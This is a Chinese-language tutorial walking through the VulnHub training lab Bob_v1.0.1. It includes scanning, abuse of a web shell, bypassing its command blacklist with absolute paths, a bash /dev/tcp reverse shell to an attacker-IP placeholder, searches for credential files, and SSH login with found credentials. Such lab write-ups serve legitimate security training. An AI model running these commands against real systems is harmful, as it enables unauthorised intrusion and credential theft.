vulnhub靶场之Bob_v1.0.1
字数 1363 2025-08-10 20:35:54
Vulnhub靶场Bob_v1.0.1渗透测试教学文档
1. 靶场概述
Bob_v1.0.1是Vulnhub上的一个渗透测试靶场,适合初学者学习基本的渗透测试流程和技术。该靶场包含多种漏洞类型,包括信息泄露、WebShell利用、过滤绕过、权限提升等。
2. 信息收集阶段
2.1 主机与端口扫描
使用工具如nmap进行扫描:
nmap -sV 10.9.44.234
发现开放80端口(HTTP服务),这是主要攻击面。
2.2 Web应用枚举
- 手动浏览网站:发现陌生网站,可能是目标
- 目录扫描:
- 使用御剑或其他目录扫描工具
- 发现敏感目录和文件
- 信息收集重点:
- Contact Us页面可能包含用户名信息
- Robots.txt文件可能包含敏感路径
- 备份文件(.bak)可能泄露源代码
3. 威胁建模
3.1 攻击面分析
- SSH服务:可尝试爆破,但效率低
- WebShell:发现dev_shell.php,是主要突破口
- 过滤机制:存在命令黑名单
3.2 可用攻击路径
- 通过WebShell执行命令
- 绕过过滤机制建立反弹shell
- 通过信息泄露获取凭证
4. WebShell利用
4.1 WebShell基础
WebShell是以asp、php、jsp或cgi等网页文件形式存在的代码执行环境,可用于服务器控制。
4.2 测试WebShell功能
- 尝试基本命令:
whoami- 成功执行ls,pwd- 被过滤
- 发现使用绝对路径可绕过:
/bin/ls- 成功执行
4.3 获取黑名单
通过/bin/ls发现备份文件dev_shell.php.bak,查看内容:
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
5. 反弹Shell建立
5.1 反弹Shell原理
反弹Shell是让目标机器主动连接攻击者机器,从而绕过防火墙限制。
5.2 常用反弹Shell方法
- 使用netcat(被过滤)
- 使用bash:
bash -i >& /dev/tcp/攻击者IP/端口 0>&1 - 使用python/perl等脚本
5.3 实际实施
- 在攻击机监听端口:
nc -lvnp 4444 - 在WebShell执行反弹命令:
/bin/bash -c 'bash -i >& /dev/tcp/攻击者IP/4444 0>&1'
6. 权限提升
6.1 初步信息收集
-
查看当前用户:
id输出:uid=33(www-data) gid=33(www-data)
-
查找敏感文件:
find / -name "*pass*" -type f 2>/dev/null find / -name "*.txt" -type f 2>/dev/null
6.2 发现用户目录
- 进入/home目录查看用户:
ls -la /home - 发现bob用户目录,查看内容:
ls -la /home/bob - 发现敏感信息:
- jc wwccbb$ (可能是SSH凭证)
- 加密信息(使用AES加密)
6.3 解密与提权
- 尝试使用收集的凭证登录SSH:
ssh jc@目标IP 密码:wwccbb$ - 如果失败,尝试解密AES加密信息
- 发现其他用户凭证:dirk
7. 获取Flag
- 找到flag文件:
find / -name "flag*" -type f 2>/dev/null - 通常位于/root或/home/user目录下
- 需要root权限才能读取
8. 总结与技巧
8.1 渗透测试流程
- 信息收集 → 威胁建模 → 漏洞利用 → 权限提升 → 获取目标
8.2 实用技巧
- 使用
ls -a查看隐藏文件 - 备份文件(.bak)是重要信息源
- 绝对路径可绕过命令过滤
- 用户目录和配置文件常包含敏感信息
8.3 防御建议
- 避免使用弱密码
- 限制WebShell功能
- 定期检查备份文件
- 实施最小权限原则
9. 扩展学习
- WebShell详解:WebShell基础详解
- 反弹Shell技术:反弹Shell详解
通过本靶场练习,可以掌握基本的Web渗透测试流程和技术要点。